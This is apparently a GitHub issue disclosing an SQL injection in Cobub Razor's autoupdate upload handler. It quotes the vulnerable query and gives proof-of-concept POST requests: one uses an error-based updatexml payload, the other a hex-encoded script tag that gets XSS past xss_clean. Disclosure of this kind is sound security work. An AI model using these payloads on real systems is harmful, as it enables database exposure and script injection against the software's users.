cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution
http://www.cobub.com
1.13k stars 431 forks source link

SQLi vulnerability #178

Open LioTree opened 8 months ago

LioTree commented 8 months ago

Hi, I want to report a SQLi vulnerability.

In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187 $description is controlled by users and has few restrictions on its format.

$this->form_validation->set_rules('description', lang('v_man_au_updateLog'), 'trim|required|xss_clean');
$this->form_validation->set_rules('versionid', lang('v_man_au_versionID'), 'trim|required|xss_clean|callback_versionid_check');
//......
  $description = $this->input->post('description');
  $versionid = $this->input->post('versionid');

  $versioninfo = $this->channel->getversionid($cp_id, $versionid, $upinfo);
  if ($versioninfo) {
    $isupdate = $this->channel->updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo);
    if ($isupdate) {
      $this->data['apkinfo'] = $this->channel->getakpinfo($userid, $cp_id);
      $this->load->view('autoupdate/updateandrlist', $this->data);
    }
  }

In ChannelModel::updateapk method, $decrption is inserted into SQL directly. https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482

$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date' 
where cp_id = $cp_id and user_id = $userid";                    
$this->db->query($sql);
$affect = $this->db->affected_rows();

POC(assume there exists a product with an ID of 1):

POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream

......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"

1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--

image

XSS can also be triggered through manipulated error messages. Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.

POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream

......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"

1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--

image